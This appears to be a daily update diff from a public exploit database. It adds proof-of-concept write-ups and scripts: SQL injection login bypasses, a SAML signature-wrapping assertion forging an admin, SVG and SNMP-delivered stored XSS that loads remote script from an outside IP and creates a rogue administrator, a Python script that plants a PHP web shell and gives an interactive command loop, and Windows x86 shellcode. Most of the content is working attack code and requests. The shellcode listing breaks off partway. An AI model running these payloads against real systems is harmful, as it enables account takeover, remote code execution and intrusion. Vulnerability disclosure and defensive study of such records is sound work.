DB: 2021-10-02

10 changes to exploits/shellcodes

Exam Form Submission System 1.0 - SQL Injection Authentication Bypass
Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation via XML Signature Wrapping
Blood Bank System 1.0 - SQL Injection / Authentication Bypass
Phpwcms 1.9.30 - File Upload to XSS
Vehicle Service Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
Dairy Farm Shop Management System 1.0 - SQL Injection Authentication Bypass
WhatsUpGold 21.0.3 - Stored Cross-Site Scripting (XSS)
CMSimple_XH 1.7.4 - Remote Code Execution (RCE) (Authenticated)
Directory Management System 1.0 - SQL Injection Authentication Bypass

Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes)

exploits/multiple/webapps/50366.txt

@@ -0,0 +1,57 @@
+# Exploit Title: WhatsUpGold 21.0.3 - Stored Cross-Site Scripting (XSS)
+# Date: 09.17.2021
+# Exploit Author: Andreas Finstad (4ndr34z)
+# Vendor Homepage: https://www.whatsupgold.com
+# Version: v.21.0.3, Build 188
+# Tested on: Windows 2019 Server
+# CVE : CVE-2021-41318
+# Reference: https://f20.be/cves/poc-cve-2021-41318
+
+Description:
+Improper validation of strings from discovered SNMP devices, makes the application prone to stored XXS attacks.
+Placing a XSS payload in one of the fields reflected onto the application, triggers the exploitation.
+No CSRF protection/token on adding/posting a new user account, makes it possible to create a rouge administrator, using a staged javascript delivered through the XSS.
+
+SNMP A nix computer placed on a subnet accessible from the server for discovery, you edit the SNMPd.conf, adding the payload:
+
+# snmpd.conf
+# An example configuration file for configuring the Net-SNMP agent ('snmpd')
+# See snmpd.conf(5) man page for details
+############################################################################
+# SECTION: System Information Setup
+# syslocation: The [typically physical] location of the system.
+# Note that setting this value here means that when trying to
+# perform an snmp SET operation to the sysLocation.0 variable will make
+# the agent return the "notWritable" error code.  IE, including
+# this token in the snmpd.conf file will disable write access to
+# the variable.
+# arguments:  location_string
+sysName Evil-Device
+sysLocation    Somewhere Over The Rainbow
+sysContact     <img id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHA6Ly8xOTIuMTY4LjY2LjQ2L3guanMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 src=x onerror=eval(atob(this.id))>
+
+This is the base64 encoded string:
+var a=document.createElement("script");a.src="http://192.168.66.46/x.js";document.body.appendChild(a);
+
+x.js:
+var vhost = window.location.protocol+'\/\/'+window.location.host
+var username = "sysadmin"
+var password = "me"
+
+fetch(vhost+'/NmConsole/api/core/WebUser',{
+    method: 'POST',
+    headers: {
+        'Content-Length': '479',
+        'Accept': 'application/json',
+        'X-Requested-With': 'XMLHttpRequest',
+        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Edg/90.0.818.51',
+        'Content-Type': 'application/json',
+        'Origin': vhost,
+        'Referer': vhost+'/NmConsole/',
+        'Accept-Encoding': 'gzip, deflate',
+        'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4',
+        'Connection': 'close'
+    },
+    credentials: 'include',
+        body: '{"HomeDeviceGroupID":0,"HomeDeviceGroupPath":"My Network","LanguageID":1033,"UserRightsMask":"0","IsDgarConfigured":false,"Groups"   [1],"WebUserID":-1,"UserName":"'+username+'","AuthenticationType":1,"ApplyWebUiSessionTimeout":true,"ApplyLockoutPolicy":false,"ApplyPasswordAging":false,"ApplyPasswordComplexity":false,"ApplySessionPolicy":false,"FailedLoginCount":0,"IsLocked":false,"Password":"'+password+'","UnlockUser":false,"WebConfigurationSettings":"","id":"Wug.model.userManagement.WebUser-2"}'
+});

exploits/php/webapps/50360.txt

@@ -0,0 +1,35 @@
+# Exploit Title: Exam Form Submission System 1.0 - SQL Injection Authentication Bypass
+# Date: 30-09-2021
+# Exploit Author: Nitin Sharma (Vidvansh)
+# Vendor Homepage: https://code-projects.org
+# Product link: https://code-projects.org/exam-form-submission-in-php-with-source-code/
+# Version: 1.0
+# Tested on: XAMPP / Windows 10
+
+Steps-To-Reproduce:
+Step 1 Go to the Product admin panel http://localhost/EXAM_FORM_SUBMISSION/admin/index.php.
+Step 2 – Enter anything in username and password
+Step 3 – Click on Login and capture the request in the burp suite
+Step4 – Change the username to ' OR 1 -- -  and password to ' OR 1 -- -.
+Step 5 – Click forward and now you will be logged in as admin.
+
+POC
+POST /EXAM_FORM_SUBMISSION/admin/index.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 40
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/EXAM_FORM_SUBMISSION/admin/index.php
+Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+email='%20OR%201%20--%20-&pass='%20OR%201%20--%20-&Login=Login

exploits/php/webapps/50361.txt

@@ -0,0 +1,115 @@
+# Exploit Title: Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation via XML Signature Wrapping
+# Date: 09/07/2021
+# Exploit Author: Cristian 'void' Giustini
+# Vendor Homepage: https://www.miniorange.com/
+# Software Link: https://www.drupal.org/project/miniorange_saml
+# Version: 8.x-2.22 (REQUIRED)
+# Tested on: Linux Debian (PHP 8.0.7 with Apache/2.4.38)
+# Original article:  https://blog.hacktivesecurity.com/index.php/2021/07/09/sa-contrib-2021-036-notsosaml-privilege-escalation-via-xml-signature-wrapping-on-minorangesaml-drupal-plugin/
+# Drupal Security Advisory URL: https://www.drupal.org/sa-contrib-2021-036
+
+---
+
+The MiniorangeSAML Drupal Plugin v. 8.x-2.22 is vulnerable to XML
+Signature Wrapping Attacks that could allows an attacker to perform
+privilege escalation attacks.
+
+In order to exploit the vulnerability, the plugin must be configured
+with the "Either SAML reponse or SAML assertion must be signed" options
+enabled and an empty "x509 certificate".
+
+Administrator point of view:
+
+- Install a Drupal version (for the PoC the version 9.1.10 has been used)
+
+- Configure an external SSO system like Auth0
+
+- Configure the plugin with the Auth0 provider by checking the "Either
+SAML response or SAML assertion must be signed" and empty "x509 certificate"
+
+
+Attacker point of view:
+
+- Register a normal user on the website
+
+- Perform a login
+
+- Intercept the request with Burp Suite and decode the SAMLResponse
+parameter
+
+- Inject an additional <Saml:Assertion> object before the original one
+(example here:
+https://gist.github.com/voidz0r/30c0fb7be79abf8c79d1be9d424c9e3b#file-injected_object-xml)
+(SAMLRaider Burp extension, XSW3 payload)
+
+<saml:Assertion ID="_evil_assertion_ID" IssueInstant="2021-06-23T21:04:01.551Z" Version="2.0"
+ xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">
+ <saml:Issuer>urn:miniorange-research.eu.auth0.com</saml:Issuer>
+ <saml:Subject>
+ <saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified">admin</saml:NameID>
+ <saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
+ <saml:SubjectConfirmationData InResponseTo="_f1e26bb0bd40be366c543e2c3fe0215747f40dadbb" NotOnOrAfter="2021-06-23T22:04:01.551Z" Recipient="http://localhost:8080/samlassertion"/>
+ </saml:SubjectConfirmation>
+ </saml:Subject>
+ <saml:Conditions NotBefore="2021-06-23T21:04:01.551Z" NotOnOrAfter="2021-06-23T22:04:01.551Z">
+ <saml:AudienceRestriction>
+ <saml:Audience>http://localhost:8080</saml:Audience>
+ </saml:AudienceRestriction>
+ </saml:Conditions>
+ <saml:AuthnStatement AuthnInstant="2021-06-23T21:04:01.551Z" SessionIndex="_WWwvhpmMv5eJI4bwPdsPAiasFpTH8gt_">
+ <saml:AuthnContext> <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:unspecified</saml:AuthnContextClassRef>
+ </saml:AuthnContext>
+ </saml:AuthnStatement>
+ <saml:AttributeStatement xmlns:xs="http://www.w3.org/2001/XMLSchema"
+ xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
+ <saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
+ <saml:AttributeValue xsi:type="xs:string">admin</saml:AttributeValue>
+ </saml:Attribute>
+ <saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
+ <saml:AttributeValue xsi:type="xs:string">test@example.com</saml:AttributeValue>
+ </saml:Attribute>
+ <saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
+ <saml:AttributeValue xsi:type="xs:string">test@example.com</saml:AttributeValue>
+ </saml:Attribute>
+ <saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/upn" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
+ <saml:AttributeValue xsi:type="xs:string">test@example.com</saml:AttributeValue>
+ </saml:Attribute>
+ <saml:Attribute Name="http://schemas.auth0.com/identities/default/connection" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
+ <saml:AttributeValue xsi:type="xs:string">Username-Password-Authentication</saml:AttributeValue>
+ </saml:Attribute>
+ <saml:Attribute Name="http://schemas.auth0.com/identities/default/provider" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
+ <saml:AttributeValue xsi:type="xs:string">auth0</saml:AttributeValue>
+ </saml:Attribute>
+ <saml:Attribute Name="http://schemas.auth0.com/identities/default/isSocial" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
+ <saml:AttributeValue xsi:type="xs:boolean">false</saml:AttributeValue>
+ </saml:Attribute>
+ <saml:Attribute Name="http://schemas.auth0.com/clientID" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
+ <saml:AttributeValue xsi:type="xs:string">8bbK44pPnBAqzN49pSuwmgdhgsZavkNI</saml:AttributeValue>
+ </saml:Attribute>
+ <saml:Attribute Name="http://schemas.auth0.com/created_at" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
+ <saml:AttributeValue xsi:type="xs:anyType">Wed Jun 23 2021 21:01:51 GMT+0000 (Coordinated Universal Time)</saml:AttributeValue>
+ </saml:Attribute>
+ <saml:Attribute Name="http://schemas.auth0.com/email_verified" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
+ <saml:AttributeValue xsi:type="xs:boolean">false</saml:AttributeValue>
+ </saml:Attribute>
+ <saml:Attribute Name="http://schemas.auth0.com/nickname" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
+ <saml:AttributeValue xsi:type="xs:string">test</saml:AttributeValue>
+ </saml:Attribute>
+ <saml:Attribute Name="http://schemas.auth0.com/picture" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
+ <saml:AttributeValue xsi:type="xs:string">https://s.gravatar.com/avatar/55502f40dc8b7c769880b10874abc9d0?s=480&r=pg&d=https%3A%2F%2Fcdn.auth0.com%2Favatars%2Fte.png</saml:AttributeValue>
+ </saml:Attribute>
+ <saml:Attribute Name="http://schemas.auth0.com/updated_at" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
+
+ <saml:AttributeValue xsi:type="xs:anyType">Wed Jun 23 2021 21:01:51 GMT+0000 (Coordinated Universal Time)</saml:AttributeValue>
+
+ </saml:Attribute>
+
+ </saml:AttributeStatement>
+
+</saml:Assertion>
+
+- Replace the username with one with higher privileges (like admin)
+
+- Submit the request
+
+- Successful exploitation

exploits/php/webapps/50362.txt

@@ -0,0 +1,40 @@
+# Exploit Title: Blood Bank System 1.0 - SQL Injection / Authentication Bypass
+# Date: 30-9-2021
+# Exploit Author: Nitin Sharma (vidvansh)
+# Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code/
+# Software Link : https://download.code-projects.org/details/f44a4ba9-bc33-48c3-b030-02f62117d230
+# Version: 1.0
+# Tested on: Windows 10 , Apache , Mysql
+
+# Description : Password input is affected with authentication bypass because of improper sanitisation which lead to access to auauthorised accounts.
+
+#Steps-To-Reproduce:
+Step 1 Go to the Product admin panel http://localhost/bloodbank/login.php.
+Step 2 – Enter anything in username and password
+Step 3 – Click on Login and capture the request in the burp suite
+Step4 – Change the username to ' OR 1 -- -  and password to ' OR 1 -- -.
+Step 5 – Click forward and now you will be logged in as admin.
+
+# PoC:
+
+GET /bloodbank/file/../bloodrequest.php?msg=Gandhi%20hospital%20have%20logged%20in. HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/bloodbank/login.php
+Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+# Authentication Bypass:
+
+# Go to admin login page (http://localhost/bloodbank/login.php), then use below payload as username and password =>
+Username: ** Random email**
+Password: ' or 1 -- -

exploits/php/webapps/50363.txt

@@ -0,0 +1,35 @@
+# Exploit Title: Phpwcms 1.9.30 - File Upload to XSS
+# Date: 30/9/2021
+# Exploit Author: Okan Kurtulus | okankurtulus.com.tr
+# Software Link: http://www.phpwcms.org/
+# Version: 1.9.30
+# Tested on: Ubuntu 16.04
+
+Steps:
+
+1-) You need to login to the system.
+http://target.com/phpwcms/login.php
+
+2-) Creating payload with SVG extension: payload.svg
+
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+
+<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+   <rect width="300" height="100" style="fill:rgb(255,0,0);stroke-width:3;stroke:rgb(0,0,0)" />
+   <script type="text/javascript">
+      alert("XSS!");
+   </script>
+</svg>
+
+
+3-) Go to the following link and upload the payload:
+http://target.com/phpwcms/phpwcms.php?csrftoken=b72d02a26550b9877616c851aa6271be&do=files&p=8
+
+From the menu:
+
+file -> multiple file upload -> Select files or drop here
+
+4-) After uploading payload, call it from the link below.
+
+http://192.168.1.112/phpwcms/upload/

exploits/php/webapps/50365.txt

@@ -0,0 +1,32 @@
+# Exploit Title: Dairy Farm Shop Management System 1.0 - SQL Injection Authentication Bypass
+# Date: 2021-09-30
+# Exploit Author: sanjay singh
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/
+# Version: v1.0
+# Tested on: Windows 10
+
+Steps-To-Reproduce:
+Step 1 Go to the Product admin panel http://localhost/dfsms/index.php.
+Step 2 – Enter anything in username and password
+Step 3 – Click on Login and capture the request in the burp suite
+Step 4 – Change the username to admin' or '1'='1  and password to dfsms
+Step 5 – Click forward and now you will be logged in as admin.
+
+POC
+
+POST /dfsms/index.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 57
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/dfsms/index.php
+Cookie: PHPSESSID=hgjvarn4tie1nmsufdn8mf1hrl
+Upgrade-Insecure-Requests: 1
+
+username=admin%27+or+%271%27%3D%271&password=dfsms&login=

exploits/php/webapps/50367.py

@@ -0,0 +1,189 @@
+# Exploit Title: CMSimple_XH 1.7.4 - Remote Code Execution (RCE) (Authenticated)
+# Date: 01-10-2021
+# Exploit Author: Halit AKAYDIN (hLtAkydn)
+# Vendor Homepage: https://www.cmsimple-xh.org/
+# Software Link: https://www.cmsimple-xh.org/?Downloads
+# Version: 1.7.4
+# Category: Webapps
+# Tested on: Linux/Windows
+
+
+# CMSimple_XH is an open source project under GPL3 license
+# Includes an endpoint that allows remote access
+# Backup page is misconfigured, causing security vulnerability
+# User information with sufficient permissions is required.
+
+# Example: python3 exploit.py -u http://example.com -p Admin123
+
+
+
+from bs4 import BeautifulSoup
+from time import sleep
+import requests
+import argparse
+
+
+def main():
+parser = argparse.ArgumentParser(description='CMSimple_XH Version 1.7.4 - Remote Code Execution (Authenticated)')
+parser.add_argument('-u', '--host', type=str, required=True)
+parser.add_argument('-p', '--password', type=str, required=True)
+args = parser.parse_args()
+print("\nCMSimple_XH Version 1.7.4 - Remote Code Execution (Authenticated)",
+"\nExploit Author: Halit AKAYDIN (hLtAkydn)\n")
+host(args)
+
+
+
+def host(args):
+#Check http or https
+if args.host.startswith(('http://', 'https://')):
+print("[?] Check Url...\n")
+sleep(2)
+args.host = args.host
+if args.host.endswith('/'):
+args.host = args.host[:-1]
+else:
+pass
+else:
+print("\n[?] Check Adress...\n")
+sleep(2)
+args.host = "http://" + args.host
+args.host = args.host
+if args.host.endswith('/'):
+args.host = args.host[:-1]
+else:
+pass
+
+
+# Check Host Status
+try:
+response = requests.get(args.host)
+if response.status_code == 200:
+login(args)
+else:
+print("[-] Address not reachable!")
+sleep(2)
+
+except requests.ConnectionError as exception:
+print("[-] Address not reachable!")
+sleep(2)
+exit(1)
+
+
+def login(args):
+
+url = args.host + "/?&login"
+cookies = {
+"XH_2f": "evil"
+}
+headers = {
+"Origin": args.host,
+"Content-Type": "application/x-www-form-urlencoded",
+"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
+"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
+"Referer": args.host + "/?&login"
+}
+data = {
+"login": "true",
+"keycut": args.password,
+"submit": "Login"
+}
+response = requests.post(url, headers=headers, cookies=cookies, data=data)
+
+token = response.cookies.get("XH_2f")
+soup = BeautifulSoup(response.text, 'html.parser')
+
+if (soup.find("link",{"rel":"next"})['href'] != "/"):
+print("[!] Login Success!\n")
+sleep(2)
+csrf(args,token)
+else:
+print("[!] Wrong password!!\n")
+sleep(2)
+
+
+def csrf(args, token):
+
+url = args.host + "/?file=content"
+cookies = {
+"status": "adm",
+"XH_2f": token
+}
+headers = {
+"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
+"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
+"Referer": args.host + "/?&settings",
+"Accept-Encoding": "gzip, deflate",
+"Connection": "close"
+}
+response = requests.get(url, headers=headers, cookies=cookies)
+
+try:
+soup = BeautifulSoup(response.text, 'html.parser')
+csrf = soup.find_all("input", type="hidden")[3].get("value")
+create(args, token, csrf)
+except Exception as e:
+print(e)
+else:
+pass
+
+
+
+def create(args, token, csrf):
+
+payload = "<?php\r\nfile_put_contents('./evil.php', \"\\x3c\\x3fphp system(\\x24_GET['cmd']);\\x3f\\x3e\");\r\n?>\r\n"
+
+url = args.host
+cookies = {
+"status": "adm",
+"XH_2f": token
+}
+headers = {
+"Origin": args.host,
+"Content-Type": "application/x-www-form-urlencoded",
+"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
+"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
+"Referer": args.host + "/?file=content&action=edit&xh_success=content",
+"Accept-Encoding": "gzip, deflate"
+}
+data = {
+"text": payload,
+"file": "content",
+"action": "save",
+"xh_csrf_token": csrf
+}
+response = requests.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=True)
+
+if (response.status_code == 200):
+print("[!] Create Vuln File!\n")
+sleep(2)
+exploit(args)
+else:
+print("[!] Create Failed!\n")
+sleep(2)
+
+
+def exploit(args):
+
+print("[+] Exploit Done!\n")
+sleep(2)
+
+while True:
+cmd = input("$ ")
+url = args.host + "/evil.php?cmd=" + cmd
+headers = {
+"Upgrade-Insecure-Requests": "1",
+"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0"
+}
+
+response = requests.post(url, headers=headers, timeout=5)
+
+if response.text == "":
+print(cmd + ": command not found\n")
+else:
+print(response.text)
+
+
+
+if __name__ == '__main__':
+main()

exploits/php/webapps/50370.txt

@@ -0,0 +1,32 @@
+# Exploit Title: Directory Management System  1.0 - SQL Injection Authentication Bypass
+# Date: 2021-10-01
+# Exploit Author: SUDONINJA
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/directory-management-system-using-php-and-mysql/
+# Version: v1.0
+# Tested on: Windows 10
+
+Steps-To-Reproduce:
+Step 1 Go to the Product admin panel http://localhost/dfsms/index.php.
+Step 2 – Enter anything in username and password
+Step 3 – Click on Login and capture the request in the burp suite
+Step 4 – Change the username to admin' or '1'='1  and password to dfsms
+Step 5 – Click forward and now you will be logged in as admin.
+
+POC
+
+POST /dms/admin/ HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 83
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/dms/admin/
+Cookie: PHPSESSID=hgjvarn4tie1nmsufdn8mf1hrl
+Upgrade-Insecure-Requests: 1
+
+username=admin%27+or+%271%27%3D%271&password=admin%27+or+%271%27%3D%271&login=login

files_exploits.csv

@@ -44474,3 +44474,12 @@ id,file,description,date,author,type,platform,port
 50356,exploits/php/webapps/50356.py,"Cmsimple 5.4 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,pussycat0x,webapps,php,
 50357,exploits/php/webapps/50357.txt,"Pharmacy Point of Sale System 1.0 - 'Multiple' SQL Injection (SQLi)",1970-01-01,Murat,webapps,php,
 50359,exploits/multiple/webapps/50359.txt,"PlaceOS 1.2109.1 - Open Redirection",1970-01-01,"Hamza Khedr",webapps,multiple,
+50360,exploits/php/webapps/50360.txt,"Exam Form Submission System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Nitin Sharma",webapps,php,
+50361,exploits/php/webapps/50361.txt,"Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation via XML Signature Wrapping",1970-01-01,"Cristian \'void\' Giustini",webapps,php,
+50362,exploits/php/webapps/50362.txt,"Blood Bank System 1.0 - SQL Injection / Authentication Bypass",1970-01-01,"Nitin Sharma",webapps,php,
+50363,exploits/php/webapps/50363.txt,"Phpwcms 1.9.30 - File Upload to XSS",1970-01-01,"Okan Kurtulus",webapps,php,
+50364,exploits/php/webapps/50364.py,"Vehicle Service Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Ghuliev,webapps,php,
+50365,exploits/php/webapps/50365.txt,"Dairy Farm Shop Management System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Sanjay Singh",webapps,php,
+50366,exploits/multiple/webapps/50366.txt,"WhatsUpGold 21.0.3 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Andreas Finstad",webapps,multiple,
+50367,exploits/php/webapps/50367.py,"CMSimple_XH 1.7.4 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Halit AKAYDIN",webapps,php,
+50370,exploits/php/webapps/50370.txt,"Directory Management System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Sanjay Singh",webapps,php,

files_shellcodes.csv

@@ -1042,3 +1042,4 @@ id,file,description,date,author,type,platform
 50125,shellcodes/linux_x86/50125.c,"Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes)",1970-01-01,d7x,shellcode,linux_x86
 50141,shellcodes/linux_x86/50141.c,"Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode",1970-01-01,d7x,shellcode,linux_x86
 50291,shellcodes/windows_x86-64/50291.c,"Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,windows_x86-64
+50368,shellcodes/windows_x86/50368.c,"Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes)",1970-01-01,"Daniel Ortiz",shellcode,windows_x86

shellcodes/windows_x86/50368.c

@@ -0,0 +1,187 @@
+; Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes)
+
+; Description:
+
+; This is a shellcode that pop a calc.exe. The shellcode iuses
+; the PEB method to locate the baseAddress of the required module and the Export Directory Table
+; to locate symbols. Also the shellcode uses a hash function to gather dynamically the required
+; symbols without worry about the length. Finally the shellcode pop the calc.exe using WinExec
+; and exits gracefully using TerminateProcess.
+
+; Author: h4pp1n3ss
+; Date: Wed 09/22/2021
+; Tested on: Microsoft Windows [Version 10.0.19042.1237]
+
+start:
+
+   mov   ebp, esp                  ;     prologue
+   add   esp, 0xfffff9f0           ;     Add space int ESP to avoid clobbering
+
+
+ find_kernel32:
+   xor   ecx, ecx                  ;     ECX = 0
+   mov   esi,fs:[ecx+0x30]         ;     ESI = &(PEB) ([FS:0x30])
+   mov   esi,[esi+0x0C]            ;     ESI = PEB->Ldr
+   mov   esi,[esi+0x1C]            ;     ESI = PEB->Ldr.InInitOrder
+
+ next_module:
+   mov   ebx, [esi+0x08]           ;     EBX = InInitOrder[X].base_address
+   mov   edi, [esi+0x20]           ;     EDI = InInitOrder[X].module_name
+   mov   esi, [esi]                ;     ESI = InInitOrder[X].flink (next)
+   cmp   [edi+12*2], cx            ;    (unicode) modulename[12] == 0x00 ?
+   jne   next_module               ;     No: try next module
+
+ find_function_shorten:
+   jmp find_function_shorten_bnc   ;     Short jump
+
+ find_function_ret:
+   pop esi                         ;     POP the return address from the stack
+   mov   [ebp+0x04], esi           ;     Save find_function address for later usage
+   jmp resolve_symbols_kernel32    ;
+
+ find_function_shorten_bnc:
+   call find_function_ret          ;     Relative CALL with negative offset
+
+ find_function:
+   pushad                          ;     Save all registers
+
+   mov   eax, [ebx+0x3c]           ;     Offset to PE Signature
+   mov   edi, [ebx+eax+0x78]       ;     Export Table Directory RVA
+   add   edi, ebx                  ;     Export Table Directory VMA
+   mov   ecx, [edi+0x18]           ;     NumberOfNames
+   mov   eax, [edi+0x20]           ;     AddressOfNames RVA
+   add   eax, ebx                  ;     AddressOfNames VMA
+   mov   [ebp-4], eax              ;     Save AddressOfNames VMA for later
+
+ find_function_loop:
+   jecxz find_function_finished    ;     Jump to the end if ECX is 0
+   dec   ecx                       ;     Decrement our names counter
+   mov   eax, [ebp-4]              ;     Restore AddressOfNames VMA
+   mov   esi, [eax+ecx*4]          ;     Get the RVA of the symbol name
+   add   esi, ebx                  ;     Set ESI to the VMA of the current symbol name
+
+ compute_hash:
+   xor   eax, eax                  ;     NULL EAX
+   cdq                             ;     NULL EDX
+   cld                             ;     Clear direction
+
+ compute_hash_again:
+   lodsb                           ;     Load the next byte from esi into al
+   test  al, al                    ;     Check for NULL terminator
+   jz    compute_hash_finished     ;     If the ZF is set, we've hit the NULL term
+   ror   edx, 0x0d                 ;     Rotate edx 13 bits to the right
+   add   edx, eax                  ;     Add the new byte to the accumulator
+   jmp   compute_hash_again        ;     Next iteration
+
+ compute_hash_finished:
+
+ find_function_compare:
+   cmp   edx, [esp+0x24]           ;     Compare the computed hash with the requested hash
+   jnz   find_function_loop        ;     If it doesn't match go back to find_function_loop
+   mov   edx, [edi+0x24]           ;     AddressOfNameOrdinals RVA
+   add   edx, ebx                  ;     AddressOfNameOrdinals VMA
+   mov   cx,  [edx+2*ecx]          ;     Extrapolate the function's ordinal
+   mov   edx, [edi+0x1c]           ;     AddressOfFunctions RVA
+   add   edx, ebx                  ;     AddressOfFunctions VMA
+   mov   eax, [edx+4*ecx]          ;     Get the function RVA
+   add   eax, ebx                  ;     Get the function VMA
+   mov   [esp+0x1c], eax           ;     Overwrite stack version of eax from pushad
+
+ find_function_finished:
+   popad                           ;     Restore registers
+   ret                             ;
+
+ resolve_symbols_kernel32:
+  push 0xe8afe98                  ;     WinExec hash
+  call dword ptr [ebp+0x04]       ;     Call find_function
+  mov   [ebp+0x10], eax           ;     Save WinExec address for later usage
+  push 0x78b5b983                 ;     TerminateProcess hash
+  call dword ptr [ebp+0x04]       ;     Call find_function
+  mov   [ebp+0x14], eax           ;     Save TerminateProcess address for later usage
+
+ create_calc_string:
